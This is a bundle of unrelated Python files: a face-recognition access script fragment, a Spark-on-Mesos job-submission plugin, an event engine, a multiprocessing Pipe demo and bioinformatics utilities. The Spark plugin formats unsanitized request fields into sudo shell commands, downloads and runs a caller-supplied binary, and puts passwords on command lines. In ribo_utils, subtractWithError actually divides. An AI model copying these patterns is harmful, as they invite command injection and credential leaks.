cv2.putText(cap,"Access",(x_const-85,y_const-150),cv2.FONT_HERSHEY_SIMPLEX,1.6,(0,0,255),2)
'''put your main code here'''
except:
pass
cv2.line(cap,(x_const-100,y_const+100),(x_const-100,y_const+80),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const+100),(x_const-80,y_const+100),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const+100),(x_const+80,y_const+100),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const+100),(x_const+100,y_const+80),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const-100),(x_const+100,y_const-80),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const-100),(x_const+80,y_const-100),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const-100),(x_const-100,y_const-80),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const-100),(x_const-80,y_const-100),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const-100+i*10),(x_const+100,y_const-100+i*10),(0,255,0),2)
cv2.putText(cap, "FPS:%d"%int(cv2.getTickFrequency()/(cv2.getTickCount()-time)), (5,15), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)
cv2.imshow('face',cap)
a = cv2.waitKey(1)
if a == ord('c') or a == ord('C'):
break
video.release()
cv2.destroyAllWindows()
def face_compare(Tx,Rx):
while True:
options = {"liveness_control":"HIGH"}
try:
result = client.search(str(base64.b64encode(Tx.get()),'UTF-8'), imageType, groupIdList,options)
except:
continue
if "SUCCESS" in result["error_msg"] and result["result"]["user_list"][0]["score"] >= 80:
Rx.put(True)
if __name__ == '__main__':
Tx = Queue()
Rx = Queue()
p = Process(target = face_compare,args = (Tx,Rx),daemon = True)
p.start()
video_show()
|
plugin.py
|
# Copyright (c) 2017 UFCG-LSD and UPV-GRyCAP.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from broker import exceptions as ex
from broker.plugins import base
from broker.service import api
from broker.utils.framework import optimizer
from broker.utils.framework import monitor
from broker.utils.framework import controller
from broker.utils.plugins import mesos
from broker.utils import ssh
from broker.utils.logger import Log, configure_logging
from broker.plugins.base import GenericApplicationExecutor
from uuid import uuid4
import time
import threading
plugin_log = Log("Spark-Mesos_Plugin", "logs/mesos_plugin.log")
configure_logging()
class SparkMesosApplicationExecutor(GenericApplicationExecutor):
def __init__(self, app_id, frameworks_url):
self.application_state = "None"
self.state_lock = threading.RLock()
self.application_time = -1
self.start_time = -1
self.app_id = app_id
self.frameworks_url = frameworks_url
def get_application_state(self):
with self.state_lock:
state = self.application_state
return state
def update_application_state(self, state):
with self.state_lock:
self.application_state = state
def get_application_execution_time(self):
return self.application_time
def get_application_start_time(self):
return self.start_time
def start_application(self, data):
try:
self.update_application_state("Running")
plugin_log.log("%s | Starting application execution" %
(time.strftime("%H:%M:%S")))
binary_url = str(data['binary_url'])
execution_class = str(data['execution_class'])
execution_parameters = str(data['execution_parameters'])
expected_time = int(data['expected_time'])
number_of_jobs = int(data['number_of_jobs'])
starting_cap = int(data['starting_cap'])
# Optimizer integration
app_name = data['app_name']
days = 0
if app_name.lower() == 'bulma':
if 'days' in data.keys():
days = data['days']
else:
self._log("""%s | 'days' parameter missing"""
% (time.strftime("%H:%M:%S")))
raise ex.ConfigurationError()
cores, vms = optimizer.get_info(api.optimizer_url,
expected_time,
app_name,
days)
optimizer_command = ''
if cores >= 0:
optimizer_command = ' --total-executor-cores %d ' % cores
plugin_log.log("%s | Submission id: %s" %
(time.strftime("%H:%M:%S"), self.app_id))
plugin_log.log("%s | Connecting with Mesos cluster..." %
(time.strftime("%H:%M:%S")))
conn = ssh.get_connection(api.mesos_url, api.cluster_username,
api.cluster_password,
api.cluster_key_path)
plugin_log.log("%s | Connected with Mesos cluster" %
(time.strftime("%H:%M:%S")))
# Execute all the spark needed commands
# to run an spark job from command line
if execution_class != "" and execution_class is not None:
# If the class field is empty, it means that the
# job binary is python
binary_path = '~/exec_bin.jar'
spark_run = ('sudo %s --name %s '
+ '--master mesos://%s:%s '
+ optimizer_command
+ '--class %s %s %s')
else:
binary_path = '~/exec_bin.py'
spark_run = ('sudo %s --name %s '
+ '--master mesos://%s:%s '
+ optimizer_command
+ '%s %s %s')
plugin_log.log("%s | Download the binary to cluster" %
(time.strftime("%H:%M:%S")))
try:
stdin, stdout, stderr = conn.exec_command('wget %s -O %s' %
(binary_url,
binary_path))
plugin_log.log("%s | Waiting for download the binary..." %
(time.strftime("%H:%M:%S")))
# TODO: Fix possible wget error
stdout.read()
plugin_log.log("%s | Binary downloaded" %
(time.strftime("%H:%M:%S")))
except Exception as e:
plugin_log.log("%s | Error downloading binary" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
return "Error"
i, o, e = conn.exec_command(spark_run % (api.spark_path,
self.app_id,
api.mesos_url,
api.mesos_port,
execution_class,
binary_path,
execution_parameters))
# Discovery ips of the executors from Mesos
# and discovery the ids on KVM using the ips
list_vms_one = ('onevm list --user %s --password %s --endpoint %s'
% (api.one_username,
api.one_password,
api.one_url))
stdin, stdout, stderr = conn.exec_command(list_vms_one)
list_response = stdout.read()
vms_ips, master = mesos.get_executors_ip(
conn, self.frameworks_url, self.app_id
)
plugin_log.log("%s | Master: %s"
% (time.strftime("%H:%M:%S"), master))
plugin_log.log("%s | Executors: %s"
% (time.strftime("%H:%M:%S"), vms_ips))
vms_ids = mesos.extract_vms_ids(list_response)
plugin_log.log("%s | Executors IDs: %s"
% (time.strftime("%H:%M:%S"), vms_ids))
executors_vms_ids = []
for ip in vms_ips:
for id in vms_ids:
vm_info_one = ('onevm show %s '
'--user %s '
'--password %s '
'--endpoint %s' % (id, api.one_username,
api.one_password,
api.one_url))
stdin, stdout, stderr = conn.exec_command(vm_info_one)
if ip in stdout.read():
executors_vms_ids.append(id)
break
plugin_log.log("%s | Executors IDs: %s" %
(time.strftime("%H:%M:%S"), executors_vms_ids))
# Set up the initial configuration of cpu cap
controller.setup_environment(api.controller_url, executors_vms_ids,
starting_cap, data)
info_plugin = {"spark_submisson_url": master,
"expected_time": expected_time,
"number_of_jobs": number_of_jobs}
plugin_log.log("%s | Starting monitor" %
(time.strftime("%H:%M:%S")))
monitor.start_monitor(api.monitor_url, self.app_id,
'spark-mesos', info_plugin, 2)
plugin_log.log("%s | Starting controller" %
(time.strftime("%H:%M:%S")))
controller.start_controller(api.controller_url,
self.app_id,
executors_vms_ids,
data)
# This command locks the plugin execution
# until the execution be done
print o.read()
plugin_log.log("%s | Stopping monitor" %
(time.strftime("%H:%M:%S")))
monitor.stop_monitor(api.monitor_url, self.app_id)
plugin_log.log("%s | Stopping controller" %
(time.strftime("%H:%M:%S")))
controller.stop_controller(api.controller_url, self.app_id)
plugin_log.log("%s | Remove binaries" %
(time.strftime("%H:%M:%S")))
conn.exec_command('rm -rf ~/exec_bin.*')
plugin_log.log("%s | Finished application execution" %
(time.strftime("%H:%M:%S")))
self.update_application_state("OK")
return 'OK'
except Exception as e:
plugin_log.log(e.message)
print e.message
self.update_application_state("Error")
class SparkMesosProvider(base.PluginInterface):
def __init__(self):
self.running_application = SparkMesosApplicationExecutor(None, None)
def get_title(self):
return 'Spark-Mesos on Open Nebula plugin for BigSea framework'
def get_description(self):
return 'It runs an spark application on a Mesos cluster'
def to_dict(self):
return {
'name': self.name,
'title': self.get_title(),
'description': self.get_description(),
}
def busy(self):
application_state = self.running_application.get_application_state()
if application_state == "Running":
return True
else:
return False
def execute(self, data):
if not self.busy():
frameworks_url = "%s:%s" % (api.mesos_url,
api.mesos_port)
app_id = "app-spark-mesos-" + str(uuid4())[:8]
executor = SparkMesosApplicationExecutor(app_id, frameworks_url)
handling_thread = threading.Thread(
target=executor.start_application, args=(data,)
)
handling_thread.start()
else:
plugin_log.log("%s | Cluster busy" % (time.strftime("%H:%M:%S")))
return ("", None)
self.running_application = executor
return (app_id, executor)
|
event_engine.py
|
# encoding: UTF-8
# 系统模块
from Queue import Queue, Empty
from threading import Thread
from time import sleep
from collections import defaultdict
EVENT_TIMER = 'eTimer' # 计时器事件,每隔1秒发送一次
class EventEngine(object):
"""
计时器使用python线程的事件驱动引擎
"""
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target = self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
def start(self):
"""引擎启动"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
self.__timerActive = True
self.__timer.start()
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
class Event:
"""事件对象"""
def __init__(self, type_=None):
"""Constructor"""
self.type_ = type_ # 事件类型
self.dict_ = {} # 字典用于保存具体的事件数据
def test():
"""测试函数"""
import tushare
def simpletest(event):
info = tushare.get_realtime_quotes('000333')
print u'当前的美的股价为:{0}'.format(info)
ee = EventEngine()
ee.register(EVENT_TIMER, simpletest)
ee.start()
# 直接运行脚本可以进行测试
if __name__ == '__main__':
test()
|
pipes.py
|
"""
"멀티프로세싱"절 예시
`multiprocessing` 모듈의 파이프를
커뮤니케이션 채널로 이용하는 방법을 설명한다.
"""
from multiprocessing import Process, Pipe
class CustomClass:
pass
def worker(connection):
while True:
instance = connection.recv()
if instance:
print(f"CHLD: recv: {instance}")
if instance is None:
break
def main():
parent_conn, child_conn = Pipe()
child = Process(target=worker, args=(child_conn,))
for item in (
42,
"some string",
{"one": 1},
CustomClass(),
None,
):
print("PRNT: send: {}".format(item))
parent_conn.send(item)
child.start()
child.join()
if __name__ == "__main__":
main()
|
ribo_utils.py
|
import os
import operator
import itertools
import gzip
import numpy as np
from scipy import stats
import dill as pickle
import math
import multiprocessing
from collections import defaultdict
'''
Colorblind safe colors from Bang Wong, Nature Methods 8. 441 (2011)
'''
black = (0,0,0)
orange = (230/255.0,159/255.0,0)
skyBlue = (86/255.0,180/255.0,233/255.0)
bluishGreen = (0,158/255.0,115/255.0)
yellow = (240/255.0,228/255.0,66/255.0)
blue = (0,114/255.0,178/255.0)
vermillion = (213/255.0,94/255.0,0)
reddishPurple = (204/255.0,121/255.0,167/255.0)
colors = [black, orange, skyBlue, bluishGreen, vermillion, blue, reddishPurple, yellow]
rainbow = [black, vermillion, orange, bluishGreen, blue, reddishPurple, 'violet']
markers = ['.', 'o', 'v', 's', '^', 'p', 'x', '+']
line_styles = ['solid', 'dashed', 'dotted']
bokeh_black = (0,0,0)
bokeh_orange = (230,159,0)
bokeh_skyBlue = (86,180,233)
bokeh_bluishGreen = (0,158,115)
bokeh_yellow = (240,228,66)
bokeh_blue = (0,114,178)
bokeh_vermillion = (213,94,0)
bokeh_reddishPurple = (204,121,167)
###############################
#Parralellization code from
# http://stackoverflow.com/questions/3288595/multiprocessing-using-pool-map-on-a-function-defined-in-a-class
###############################
def spawn(f):
def fun(q_in,q_out):
while True:
i,x = q_in.get()
if i == None:
break
q_out.put((i,f(x)))
return fun
def parmap(f, X, nprocs = multiprocessing.cpu_count()):
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=spawn(f),args=(q_in,q_out)) for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i,x)) for i,x in enumerate(X)]
[q_in.put((None,None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i,x in sorted(res)]
##########
#FILE HANDLING
##########
def unPickle(fileName):
#returns the pickled object stored in a pickle file
f = open(fileName, 'r')
o = pickle.load(f)
f.close()
return o
def makePickle(o, fileName, protocol=pickle.HIGHEST_PROTOCOL):
f = open(fileName, 'w')
pickle.dump(o, f, protocol=protocol)
f.close()
def make_dir(dirname):
"""
Makes the directory; doesn't throw an error if it exists.
"""
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except:
print 'The directory was made by another thread extremely recently.'
def file_exists(fname):
"""
makes sure a given file exists
"""
if not os.path.exists(fname):
return False
fstats = os.stat(fname)
if not fstats[6]:
return False
if not os.access(fname, os.R_OK):
raise ValueError('Input File %s cannot be read' % fname)
return True
def file_len(fname):
if fname.endswith('.gz'):
f = gzip.open(fname)
else:
f = open(fname)
for i, l in enumerate(f):
pass
return i + 1
def tsv_to_dict(filename, header = True, delimiter = '\t', key_column = 0, convert_to_float = False):
"""
Will return a dict index first by the row labels, then by the column headers
"""
return_dict = {}
f = open(filename)
lines = f.readlines()
headers = lines[0].strip('\n').split(delimiter)
for line in lines[1:]:
ll= line.strip('\n').split(delimiter)
return_dict[ll[key_column]] = {}
for i in range(0, len(ll)):
if not i == key_column:
if not convert_to_float:
return_dict[ll[key_column]][headers[i]]=ll[i]
elif isinstance(ll[i], float):
return_dict[ll[key_column]][headers[i]]=float(ll[i])
f.close()
return return_dict
##########
#MATH
##########
def divideWithError(num, stdDevNum, denom, stdDevDenom):
'''
divides the two values with provided standard deviations, and returns the mean and error of the ratio using standard error propogation
'''
num = float(num)
denom = float(denom)
stdDevNum = float(stdDevNum)
stdDevDenom = float(stdDevDenom)
ratio = num/denom
ratioError = ratio*math.sqrt((stdDevNum/num)**2+(stdDevDenom/denom)**2)
return ratio, ratioError
def subtractWithError(num, stdDevNum, denom, stdDevDenom):
'''
divides the two values with provided standard deviations, and returns the mean and error of the ratio using standard error propogation
'''
num = float(num)
denom = float(denom)
stdDevNum = float(stdDevNum)
stdDevDenom = float(stdDevDenom)
ratio = num/denom
ratioError = ratio*math.sqrt((stdDevNum/num)**2+(stdDevDenom/denom)**2)
return ratio, ratioError
def next_square_number(number):
return int(math.ceil(math.sqrt(number)))**2
def computePfromMeanAndStDevZscore(mean, standard_deviation, testValue):
#computes probability that test value came from a gaussian with the given mean and standard deviation
try:
z = (float(testValue)-mean)/standard_deviation
p = stats.norm.sf(z)
return p, z
except ZeroDivisionError:
return 0.5, 0
def ranges_overlap(min1, max1, min2, max2):
"""
:param min1:
:param max1:
:param min2:
:param max2:
:return: return True if the 2 ranges overlap (edge inclusive), else False
"""
if min1 <= max2 and min2 <= max1:
return True
return False
def number_passing_cutoff(numbers, cutoff):
i = 0
for number in numbers:
if number >= cutoff:
i += 1
return i
def significantly_enriched(xs, zthresh=2., scale='linear'):
assert scale in ['linear', 'log']
if scale =='log':
xs = np.log2(xs)
xs = stats.zscore(xs)
return [x > zthresh for x in xs]
def filter_x_y_pairs(x, y, filter_list = [float('inf'), -1*float('inf')]):
'''
takes 2 paired arrays, and returns matched copies of them with any positions with values in
filter_list removed from both arrays, to keep them synced.
alos removes NaN (defined by testing if the entry equals itself, which fails for NaN)
:param filter_list: list of values to remove
:return:
'''
filtered_x, filtered_y = [], []
assert len(x) == len(y)
for i in range(len(x)):
if x[i] not in filter_list and y[i] not in filter_list and x[i]==x[i] and y[i]==y[i]:
filtered_x.append(x[i])
filtered_y.append(y[i])
return np.array(filtered_x), np.array(filtered_y)
def benjaminiHochbergCorrection(pValDict):
'''
takes a dictionary mapping key to p value
returns a dictionary of Benjamini-Hochberg corrected Q values
Q = p * n / k, where n is the # of observations, and k is the rank of the particular p-value among all p-values
'''
qValues = {}
sorted_p = sorted(pValDict.iteritems(), key=operator.itemgetter(1))
n = len(sorted_p)
for i in range(n):
k = i+1
q = sorted_p[i][1] * n / k
qValues[sorted_p[i][0]] = q
return qValues
def bonferroniCorrection(pValDict):
'''
takes a dictionary mapping key to p value
returns a dictionary of Bonferroni corrected Q values
Q = p * n, where n is the # of observations
'''
qValues = {}
sorted_p = sorted(pValDict.iteritems(), key=operator.itemgetter(1))
n = len(sorted_p)
for i in range(n):
q = sorted_p[i][1] * n
qValues[sorted_p[i][0]] = q
return qValues
##################
#SEQUENCE HANDLING
##################
GENETIC_CODE = {
'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',
'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',
'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',
'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',
'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',
'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',
'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',
'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',
'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',
'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',
'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',
'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',
'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',
'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',
'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',
'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W',
}
def rna(dna_seq):
return dna_seq.replace('T','U').replace('t', 'u')
def get_barcode(line):
"""
- Extracts the barcode from the first line of a fastq quartet
- Assumes the first line is of the form:
@D5FF8JN1:4:1101:1220:2099#ACTTGA/1
"""
return line.split('#')[-1].split('/')[0]
def convertFastaToDict(fastaFile):
'''
converts a fasta file to a dict of {sequenceName:sequence}
can take extra files in * args
'''
if isinstance(fastaFile, list):
files = fastaFile
else:
files = [fastaFile]
currentName = None
currentSequence = None
seqDict = {}
for currentFile in files:
if currentFile.endswith('.gz'):
f = gzip.open(currentFile)
else:
f = open(currentFile)
for line in f:
if not line.strip() == '' and not line.startswith('#'): # ignore empty lines and commented out lines
if line.startswith('>'): # > marks the start of a new sequence
if not currentName == None: # after we've reached the firtst > line, we know what the sequence corresponds to
seqDict[currentName] = currentSequence
currentName = line.strip()[1:].split()[
0] # i've noticed the gencode names have extraneous numbering after some whitespace. This doens't match the GTF files, so I'm removing it.
currentSequence = ''
else:
currentSequence += line.strip()
f.close()
seqDict[currentName] = currentSequence
return seqDict
def hamming_N(str1, str2):
if not len(str1) == len(str2):
raise(ValueError, 'lengths don\'t match')
str1 = str1.upper()
str2 = str2.upper()
str1 = str1.replace('N', '#')
return sum(itertools.imap(operator.ne, str1, str2))
# from http://code.activestate.com/recipes/499304-hamming-distance/
def hamming_distance(str1, str2):
assert len(str1) == len(str2)
ne = operator.ne
return sum(itertools.imap(ne, str1, str2))
def reverse_complement(seq, isRNA = False):
seq = seq.upper()
compDict = {'A':'T', 'T':'A', 'U':'A', 'C':'G', 'G':'C', 'N':'N', '-':'-', '.':'.', '*':'*'}
revComp = ''.join([compDict[c] for c in seq[::-1]])
if isRNA:
return revComp.replace('T', 'U')
return revComp
def close_float_value(a, b, max_percent=1.0):
if a == 0 and b == 0:
return True
if not (a > 0 and b > 0):
return False
ratio = float(max(a, b)) / float(min(a, b))
percent_increase = (ratio - 1.0) * 100.0
return percent_increase < max_percent
def getAllMismatchedSeqs(kmer, mismatchPositions):
nucs = ['A', 'C', 'G', 'T']
#generate tuples of allowed nucs at each mismatch position using a recursive algorithm
allowedNucs = {}
mismatchPositions = np.array(mismatchPositions)
assert len(set(mismatchPositions)) == len(mismatchPositions)
if len(mismatchPositions) == 0:
yield kmer
else:
mismatchNucs = [] + nucs
#print kmer
#print mismatchPositions
#print mismatchPositions[0]
#print kmer[mismatchPositions[0]]
mismatchNucs.remove(kmer[mismatchPositions[0]])
downstreamMismatchSeqs = getAllMismatchedSeqs(kmer[mismatchPositions[0]+1:], mismatchPositions[1:]-(mismatchPositions[0]+1))
for mismatchNuc in mismatchNucs:
for downstreamMismatchSeq in downstreamMismatchSeqs:
returnSeq = kmer[:mismatchPositions[0]] + mismatchNuc +downstreamMismatchSeq
assert len(returnSeq) == len(kmer)
yield returnSeq
def getPaddedMismatchedAdjacentKmers(kmerSequence, padding, numMismatches):
'''
Yield all sequences of length (len(kmerSequence)+padding )that contain the given kmer, with exactly the given number of mismatches.
The order yielded is as follows:
First mismatches are allowed at position 0 to (numMismatches-1)
For each register:
Iterate through all possible nucs at mismatch position in alphabetical order
Iterate through each nucleotide in padding positions in alphabetical order.
Shift to next register
Move most 3' mismatch position down by one, but not past the end of the kmerSequence if end of KmerSequence
is reached, shift secondmost 3' mismatch 1 nt 3', and reset most 3' mismatch to 1nt 3' of that one
'''
# for troubleshooting, want to check that no repeats are generated, so will assert that size of this list and set
# must be the same
kmer_set = set()
kmer_list =[]
upper_to_combined = {}
nucs = 'ACGT'
#initialize mismatchPositions
#print numMismatches
if numMismatches == 0:
for mismatchedKmer in [kmerSequence]:
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
if paddedSeq not in kmer_set:
kmer_list.append(paddedSeq)
kmer_set.add(paddedSeq)
else:
mismatchPositionsList = itertools.combinations(range(len(kmerSequence)), numMismatches)
for mismatchPositions in mismatchPositionsList:
#print mismatchPositions
for mismatchedKmer in getAllMismatchedSeqs(kmerSequence, mismatchPositions):
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
paddedUpper = paddedSeq.upper()
if paddedUpper not in kmer_set:
kmer_list.append(paddedUpper)
kmer_set.add(paddedUpper)
#print kmer_list
#print kmer_set
#print len(kmer_list), len(kmer_set)
#assert len(kmer_list) == len(kmer_set)
return kmer_list
##################
#GTF file parsing and handling
##################
class genome_sequence():
def __init__(self, fasta_file, *args):
self.genome_sequence = convertFastaToDict(fasta_file, *args)
def get_sequence(self, chromosome, start, end, strand):
"""
returns a string of genome sequence at the given start and end positions, inclusive
reverse-complemented for minus strand
start and end are 1-indexed (first base-pair of genome is 1)
"""
assert end >= start
sequence = self.genome_sequence[chromosome][start - 1: end]
if strand == '-':
return reverse_complement(sequence)
else:
return sequence
class gtf_data():
def __init__(self, gtf_file, add_3_for_stop = False):
self.gtf_entries = []
# sometimes stop codons are not included in the "CDS" annottion in GTF files and instead under their own
# 3nt entries. To deal with this situation, add_3_for_stop should be set to true
self.add_3_for_stop = add_3_for_stop
self.fields = ['chr', 'source', 'type', 'start', 'end', 'score', 'strand', 'frame', 'additional']
# note: levels 1 and 2 are verified and manually annotated, repectively, 3 are automatically annotated
#self.additional_mandatory_keys = ['gene_id', 'transcript_id', 'gene_type', 'gene_status', 'gene_name',
# 'transcript_type', 'transcript_status', 'transcript_name', 'exon_number',
# 'exon_id', 'level']
self.transcript_to_entries = defaultdict(set)
self.gene_to_entries = defaultdict(set)
self.genes_to_tx = defaultdict(set)
self.tx_to_genes = {} #tx id to gene id
self.tx_to_gene_names = {} #tx id to common gene name
self.tx_to_strand = {}
self.tx_to_chr = {}
#self.feature_type_summary = defaultdict(int)
#self.transcript_type_summary = defaultdict(int)
# for each location a read maps, will keep the entry for the shortest feature found there and it's type
self.shortest_annotations = {'+':defaultdict(lambda : defaultdict(dict)),
'-':defaultdict(lambda : defaultdict(dict))}
# a dict of {chromosome: {strand: {start and/or endposition, rounded DOWN to the nearest thousand: [entries overlapping this range, sorted, first by start position, then by length}}
# Each unit of 1000 (a mille) can also potentially share entries with the neighboring ones
# So shorter entries will precede longer ones.
#I'm using integer division to do the rounding
self.chr_to_entry = None
self.add_gtf_data(gtf_file)
def add_gtf_data(self, gtf_file):
if gtf_file.endswith('.gz'):
gtf = gzip.open(gtf_file)
else:
gtf = open(gtf_file)
for line in gtf:
if not line.startswith('#'):
new_entry = gtf_entry(line, self)
self.gtf_entries.append(new_entry)
#self.feature_type_summary[new_entry.get_value('type')] += 1
#self.transcript_type_summary[new_entry.get_value('transcript_type')] += 1
gene_id = new_entry.get_value('gene_id')
transcript_id = new_entry.get_value('transcript_id')
gene_name = new_entry.get_value('gene_name')
self.tx_to_genes[transcript_id] = gene_id
self.tx_to_gene_names[transcript_id] = gene_name
strand = new_entry.get_value('strand')
self.tx_to_strand[transcript_id] = strand
chromosome = new_entry.get_value('chr')
self.tx_to_chr[transcript_id] = chromosome
if gene_id != None:
self.gene_to_entries[gene_id].add(new_entry)
if transcript_id != None:
self.transcript_to_entries[transcript_id].add(new_entry)
self.genes_to_tx[gene_id].add(transcript_id)
#self.gtf_entries.sort(key=lambda x: (x.get_value('chr'), int(x.get_value('start')), int(x.get_value('end'))))
gtf.close()
def bin_entries_on_chromosome(self, bin_size=1000):
self.chr_to_entry = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))
for entry in self.gtf_entries:
for position_bin in range(int(entry.get_value('start')) / bin_size * bin_size,
(int(entry.get_value('end')) / bin_size * bin_size) + bin_size, bin_size):
self.chr_to_entry[entry.get_value('chr')][entry.get_value('strand')][position_bin].append(entry)
assert len(self.chr_to_entry[entry.get_value('chr')][entry.get_value('strand')][position_bin]) == len(
set(self.chr_to_entry[entry.get_value('chr')][entry.get_value('strand')][position_bin]))
for chromosome in self.chr_to_entry:
for strand in self.chr_to_entry[chromosome]:
for position_bin in self.chr_to_entry[chromosome][strand]:
self.chr_to_entry[chromosome][strand][position_bin].sort(key=lambda x: (int(x.get_value('start')), int(x.get_value('end'))))
def print_transcript_multiplicity(self, gene_type=None):
self.tx_counts_histogram = defaultdict(int)
for gene_id in self.genes_to_tx:
if gene_type == None or gene_type == sorted(self.gene_to_entries[gene_id])[0].get_value('gene_type'):
self.tx_counts_histogram[len(self.genes_to_tx[gene_id])] += 1
for count in sorted(self.tx_counts_histogram.keys()):
print count, self.tx_counts_histogram[count]
def tx_with_longest_CDS(self, gene_id, starting_subset=None):
"""
starting_subset can be a list of transcript ids. If it is given, then only those transcripts will be considered
"""
if starting_subset == None:
transcripts = self.genes_to_tx[gene_id]
else:
transcripts = starting_subset
if len(transcripts) == 1:
return [sorted(transcripts)[0]]
else:
if self.add_3_for_stop:
sorted_transcripts = sorted(transcripts,
key=lambda x: int(self.spliced_length(x, exon_type=['CDS', 'stop_codon'])),
reverse=True)
longest_CDS_length = self.spliced_length(sorted_transcripts[0], exon_type=['CDS', 'stop_codon'])
return [x for x in sorted_transcripts if
self.spliced_length(x, exon_type=['CDS', 'stop_codon']) == longest_CDS_length]
else:
sorted_transcripts = sorted(transcripts,
key=lambda x: int(self.spliced_length(x, exon_type=['CDS'])),
reverse=True)
longest_CDS_length = self.spliced_length(sorted_transcripts[0], exon_type=['CDS'])
return [x for x in sorted_transcripts if
self.spliced_length(x, exon_type=['CDS']) == longest_CDS_length]
def longest_tx(self, gene_id, starting_subset=None):
if starting_subset == None:
transcripts = self.genes_to_tx[gene_id]
else:
transcripts = starting_subset
if len(transcripts) == 1:
return [sorted(transcripts)[0]]
else:
sorted_transcripts = sorted(transcripts, key=lambda x: int(self.spliced_length(x, exon_type='exon')),
reverse=True)
longest_tx_length = self.spliced_length(sorted_transcripts[0], exon_type='exon')
return [x for x in sorted_transcripts if self.spliced_length(x, exon_type='exon') == longest_tx_length]
def pick_all_longest_CDS_transcripts(self):
# picks transcripts with longest CDS
# If tied picks longest TX
# Otherwise, pick the first one randomly and make note
genes_with_ties = []
chosen_tx = []
for gene_id in self.genes_to_tx:
tx_with_longest_CDS = self.tx_with_longest_CDS(gene_id)
assert len(tx_with_longest_CDS) > 0
if len(tx_with_longest_CDS) == 1:
chosen_tx.append(tx_with_longest_CDS[0])
else:
tx_with_longest_tx = self.longest_tx(gene_id, starting_subset=tx_with_longest_CDS)
assert len(tx_with_longest_tx) > 0
